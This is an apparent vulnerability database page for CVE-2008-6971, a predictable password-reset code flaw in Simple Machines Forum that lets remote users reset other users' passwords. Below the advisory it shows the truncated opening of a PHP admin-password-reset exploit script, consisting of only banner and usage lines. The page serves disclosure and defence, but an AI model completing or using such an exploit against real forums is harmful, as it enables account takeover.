7.5
CVSSv2

CVE-2008-6971

Published: 13/08/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

The password reset functionality in Simple Machines Forum (SMF) 1.0.x prior to 1.0.14, 1.1.x prior to 1.1.6, and 2.0 prior to 2.0 beta 4 includes clues about the random number generator state within a hidden form field and generates predictable validation codes, which allows remote malicious users to modify passwords of other users and gain privileges.

Vulnerable Product Search on Vulmon Subscribe to Product

simplemachines smf 2.0-beta3

simplemachines smf 2.0

simplemachines smf 1.1.5

simplemachines smf 1.1.4

simplemachines smf 2.0-beta2

simplemachines smf 1.0.13

simplemachines smf 1.0.12

Exploits

<?php echo "---------------------------------------------------------------\n"; echo "SMF <= 115 Admin Reset Password Exploit (win32-based servers)\n"; echo "(c)oded by Raz0r (Raz0rname/)\n"; echo "---------------------------------------------------------------\n"; if ($argc<3) { echo "USAGE:\n"; echo "~~~~~~\n"; echo " ...